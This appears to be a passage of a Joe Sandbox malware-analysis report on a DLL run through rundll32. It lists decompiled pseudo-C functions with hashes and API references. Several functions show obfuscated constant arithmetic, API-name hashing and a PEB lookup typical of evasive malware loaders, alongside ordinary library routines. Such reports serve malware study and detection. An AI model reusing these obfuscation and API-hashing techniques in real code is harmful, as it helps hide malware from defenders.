                                                                                                                      			E0069DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				void* _t74;
                                                                                                                      				char* _t82;
                                                                                                                      				signed int _t84;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t82 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t74);
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                      				_v28 = 0x71ca23;
                                                                                                                      				_v24 = 0x57f692;
                                                                                                                      				_v12 = 0xd3252c;
                                                                                                                      				_v12 = _v12 + 0x4351;
                                                                                                                      				_v12 = _v12 + 0xffff5b79;
                                                                                                                      				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                      				_v8 = 0xbb067e;
                                                                                                                      				_t84 = 0x11;
                                                                                                                      				_v8 = _v8 / _t84;
                                                                                                                      				_v8 = _v8 >> 8;
                                                                                                                      				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                      				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                      				_v8 = 0xab60c2;
                                                                                                                      				_v8 = _v8 << 0x10;
                                                                                                                      				_v8 = _v8 ^ 0x910d5570;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                      				if( *__edx != 0) {
                                                                                                                      					do {
                                                                                                                      						_v8 = 0xbb067e;
                                                                                                                      						_v8 = _v8 / _t84;
                                                                                                                      						_v8 = _v8 >> 8;
                                                                                                                      						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                      						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                      						_v8 = 0xab60c2;
                                                                                                                      						_v8 = _v8 << 0x10;
                                                                                                                      						_v8 = _v8 ^ 0x910d5570;
                                                                                                                      						_v8 = _v8 >> 4;
                                                                                                                      						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                      						_v12 =  *_t82;
                                                                                                                      						_v12 = _v12 + (_v12 << _v8);
                                                                                                                      						_v12 = _v12 + (_v12 << _v8);
                                                                                                                      						_v12 = _v12 - _v12;
                                                                                                                      						_t82 = _t82 + 1;
                                                                                                                      						_t84 = 0x11;
                                                                                                                      					} while ( *_t82 != 0);
                                                                                                                      				}
                                                                                                                      				return _v12;
                                                                                                                      			}












                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                      • Instruction ID: 03082812a3083140f0958ec5feffe4ae609ff78171114c85b7b752355c3f5e9e
                                                                                                                      • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                      • Instruction Fuzzy Hash: 6631FFB5D02358EBDF06DFA8CA4A2DEBBB5EF44314F208099D501A7265D3B14B98EF40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00689011(void* __ecx, signed int __edx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _t75;
                                                                                                                      				intOrPtr _t80;
                                                                                                                      				signed int _t88;
                                                                                                                      				signed int _t89;
                                                                                                                      
                                                                                                                      				_v40 = _v40 & 0x00000000;
                                                                                                                      				_v44 = 0xa2b624;
                                                                                                                      				_v8 = 0x99eb9;
                                                                                                                      				_t88 = __edx;
                                                                                                                      				_v8 = _v8 * 0x25;
                                                                                                                      				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                      				_v24 = 0x77b72d;
                                                                                                                      				_v24 = _v24 << 1;
                                                                                                                      				_v24 = _v24 ^ 0x00e56894;
                                                                                                                      				_v20 = 0x2ce6cf;
                                                                                                                      				_v20 = _v20 >> 6;
                                                                                                                      				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                      				_v32 = 0xab4cd;
                                                                                                                      				_v32 = _v32 >> 0xc;
                                                                                                                      				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                      				_v28 = 0x1f3eea;
                                                                                                                      				_v28 = _v28 >> 9;
                                                                                                                      				_v28 = _v28 ^ 0x0004326d;
                                                                                                                      				_v12 = 0xc1e4f9;
                                                                                                                      				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                      				_v12 = _v12 + 0xcc91;
                                                                                                                      				_v12 = _v12 >> 8;
                                                                                                                      				_v12 = _v12 ^ 0x0038f912;
                                                                                                                      				_v16 = 0x3b10d4;
                                                                                                                      				_t89 = 0x6f;
                                                                                                                      				_v16 = _v16 / _t89;
                                                                                                                      				_v16 = _v16 + 0xffff4357;
                                                                                                                      				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                      				_v16 = _v16 ^ 0x074e6031;
                                                                                                                      				_v36 = 0x1364c3;
                                                                                                                      				_v36 = _v36 + 0x503c;
                                                                                                                      				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                      				_push(_v20);
                                                                                                                      				_push(_v24);
                                                                                                                      				_t75 = E00695BFD(_v32, _v28, _v12, E0069DCF7(_v8, __ecx, _v36));
                                                                                                                      				_t80 =  *0x6a3df8; // 0x0
                                                                                                                      				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                      				return E0068A8B0(_v16, _t74, _v36);
                                                                                                                      			}

















                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8cead799c93764a18a694429a7a028afb750ee6c76631ed1e13a49fec9fcae9
                                                                                                                      • Instruction ID: 53ca08b56a4c8d7e2382cc042acdaaa8f77f1bf41d9bbcd811cd7a81e0ec2a0d
                                                                                                                      • Opcode Fuzzy Hash: d8cead799c93764a18a694429a7a028afb750ee6c76631ed1e13a49fec9fcae9
                                                                                                                      • Instruction Fuzzy Hash: B231F0B1D0021EEBCF48EFA5D94A4EEBBB5FF44318F208199D421B6250D7B90A59DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00687FF2(void* __edx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				signed int _t67;
                                                                                                                      				void* _t73;
                                                                                                                      
                                                                                                                      				_v32 = _v32 & 0x00000000;
                                                                                                                      				_v40 = 0xdad9ef;
                                                                                                                      				_v36 = 0x9bb390;
                                                                                                                      				_v28 = 0x653306;
                                                                                                                      				_v28 = _v28 + 0xffff1628;
                                                                                                                      				_v28 = _v28 >> 3;
                                                                                                                      				_v28 = _v28 ^ 0x000c892d;
                                                                                                                      				_v12 = 0x5dd1e8;
                                                                                                                      				_v12 = _v12 ^ 0xb170c383;
                                                                                                                      				_v12 = _v12 | 0x2785cc64;
                                                                                                                      				_v12 = _v12 >> 5;
                                                                                                                      				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                      				_v8 = 0x56f6d9;
                                                                                                                      				_v8 = _v8 + 0xc121;
                                                                                                                      				_t73 = __edx;
                                                                                                                      				_t67 = 0x41;
                                                                                                                      				_v8 = _v8 / _t67;
                                                                                                                      				_v8 = _v8 << 7;
                                                                                                                      				_v8 = _v8 ^ 0x00a76089;
                                                                                                                      				_v24 = 0xf5edfd;
                                                                                                                      				_v24 = _v24 | 0x2f446a90;
                                                                                                                      				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                      				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                      				_v20 = 0xafa903;
                                                                                                                      				_v20 = _v20 + 0xffff9fdf;
                                                                                                                      				_v20 = _v20 ^ 0xafba618c;
                                                                                                                      				_v20 = _v20 ^ 0xaf136809;
                                                                                                                      				_v16 = 0x74f1b4;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 | 0x7bde77db;
                                                                                                                      				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                      				return E00681E22(_v28, _v24, _t73, E00681DB9(_t67), _v20, _v16);
                                                                                                                      			}















                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                      • Instruction ID: 73b6690caeb39e1fcefe94948f0f3cad0c520d5218c6269e9a3adb793f47856d
                                                                                                                      • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                      • Instruction Fuzzy Hash: 0C21EFB2C0131EEBCB48DFE5D94A5EEFBB1BB15314F208189D511B6264C3B40B498F95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00694087() {
                                                                                                                      
                                                                                                                      				return  *[fs:0x30];
                                                                                                                      			}



                                                                                                                      0x0069408d

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 84%
                                                                                                                      			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                      				void* __ebp;
                                                                                                                      				signed int _t73;
                                                                                                                      				struct HINSTANCE__* _t78;
                                                                                                                      				_Unknown_base(*)()* _t79;
                                                                                                                      				struct HINSTANCE__* _t81;
                                                                                                                      				signed int _t92;
                                                                                                                      				signed int _t94;
                                                                                                                      				unsigned int _t97;
                                                                                                                      				void* _t113;
                                                                                                                      				unsigned int _t115;
                                                                                                                      				signed short _t123;
                                                                                                                      				unsigned int _t124;
                                                                                                                      				_Unknown_base(*)()* _t131;
                                                                                                                      				signed short _t133;
                                                                                                                      				unsigned int _t134;
                                                                                                                      				intOrPtr _t143;
                                                                                                                      				void* _t144;
                                                                                                                      				int _t145;
                                                                                                                      				int _t146;
                                                                                                                      				signed int _t164;
                                                                                                                      				void* _t167;
                                                                                                                      				signed int _t169;
                                                                                                                      				void* _t170;
                                                                                                                      				int _t172;
                                                                                                                      				signed int _t176;
                                                                                                                      				void* _t177;
                                                                                                                      				CHAR* _t181;
                                                                                                                      				void* _t183;
                                                                                                                      				void* _t184;
                                                                                                                      
                                                                                                                      				_t167 = __edx;
                                                                                                                      				_t184 = _t183 - 0x118;
                                                                                                                      				_t181 = _t184 - 4;
                                                                                                                      				_t73 =  *0x100545cc; // 0xcd5fceb9
                                                                                                                      				_t181[0x118] = _t73 ^ _t181;
                                                                                                                      				_push(0x58);
                                                                                                                      				E10030D27(E10043F3E, __ebx, __edi, __esi);
                                                                                                                      				_t169 = 0;
                                                                                                                      				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                      				 *(_t181 - 0x14) = 0;
                                                                                                                      				 *(_t181 - 0x10) = 0;
                                                                                                                      				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                      				 *(_t181 - 0x18) = _t78;
                                                                                                                      				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                      				if(_t79 == 0) {
                                                                                                                      					if(GetVersion() >= 0) {
                                                                                                                      						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                      						if(_t81 != 0) {
                                                                                                                      							 *(_t181 - 0x14) = 0;
                                                                                                                      							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
                                                                                                                      							if( *(_t181 - 0x14) != 0) {
                                                                                                                      								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                      								_t145 = _t97 & 0x3ff;
                                                                                                                      								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                      								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                      								 *(_t181 - 0x10) = 2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						 *(_t181 - 0x18) = 0;
                                                                                                                      						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                      							 *(_t181 - 0x44) = 0x10;
                                                                                                                      							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                      								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                      								_t184 = _t184 + 0xc;
                                                                                                                      								if(_t113 == 1) {
                                                                                                                      									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                      									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                      									_t146 = _t115 & 0x3ff;
                                                                                                                      									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                      									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                      									 *(_t181 - 0x10) = 2;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							RegCloseKey( *(_t181 - 0x18));
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                      					 *(_t181 - 0x14) = _t123;
                                                                                                                      					_t124 = _t123 & 0x0000ffff;
                                                                                                                      					_t164 = _t124 & 0x3ff;
                                                                                                                      					 *(_t181 - 0x1c) = _t164;
                                                                                                                      					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                      					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                      					 *(_t181 - 0x10) = 2;
                                                                                                                      					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                      					if(_t131 != 0) {
                                                                                                                      						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                      						 *(_t181 - 0x14) = _t133;
                                                                                                                      						_t134 = _t133 & 0x0000ffff;
                                                                                                                      						_t172 = _t134 & 0x3ff;
                                                                                                                      						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                      						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                      						 *(_t181 - 0x10) = 4;
                                                                                                                      					}
                                                                                                                      					_t169 = 0;
                                                                                                                      				}
                                                                                                                      				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                      				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                      				_t181[0x105] = 0;
                                                                                                                      				_t181[0x104] = 0;
                                                                                                                      				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                      					_t143 = 0x20;
                                                                                                                      					E10030030(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                      					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                      					 *(_t181 - 0x5c) = _t181;
                                                                                                                      					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                      					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                      					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                      					E10014538(_t181 - 0x3c, 0xffffffff);
                                                                                                                      					 *(_t181 - 4) = _t169;
                                                                                                                      					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                      						E1001461E(_t181 - 0x3c);
                                                                                                                      					}
                                                                                                                      					_t176 = 0;
                                                                                                                      					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                      						L23:
                                                                                                                      						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                      						E10014C3E(_t181 - 0x3c);
                                                                                                                      						_t92 = _t169;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						while(1) {
                                                                                                                      							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
                                                                                                                      							if(_t94 != _t169) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							_t176 =  &(1[_t176]);
                                                                                                                      							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							goto L23;
                                                                                                                      						}
                                                                                                                      						_t169 = _t94;
                                                                                                                      						goto L23;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t92 = 0;
                                                                                                                      					L24:
                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                      					_pop(_t170);
                                                                                                                      					_pop(_t177);
                                                                                                                      					_pop(_t144);
                                                                                                                      					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                      				}
                                                                                                                      			}

































                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                      • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                      • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                      • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E1002E129(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr* _t27;
                                                                                                                      
                                                                                                                      				_t27 = __ecx;
                                                                                                                      				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                      				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                      				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                      				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                      				return _t27;
                                                                                                                      			}





                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E1003548E(void* __ebx, void* __edx) {
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                      				long _t10;
                                                                                                                      				void* _t11;
                                                                                                                      				int _t12;
                                                                                                                      				void* _t18;
                                                                                                                      				intOrPtr _t21;
                                                                                                                      				long _t26;
                                                                                                                      				void* _t30;
                                                                                                                      				void* _t37;
                                                                                                                      				struct HINSTANCE__* _t38;
                                                                                                                      				void* _t41;
                                                                                                                      				void* _t43;
                                                                                                                      
                                                                                                                      				_t37 = __edx;
                                                                                                                      				_t30 = __ebx;
                                                                                                                      				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                      				if(_t38 != 0) {
                                                                                                                      					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                      					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
                                                                                                                      					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                      					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                      					__eflags =  *0x10057934;
                                                                                                                      					_t41 = TlsSetValue;
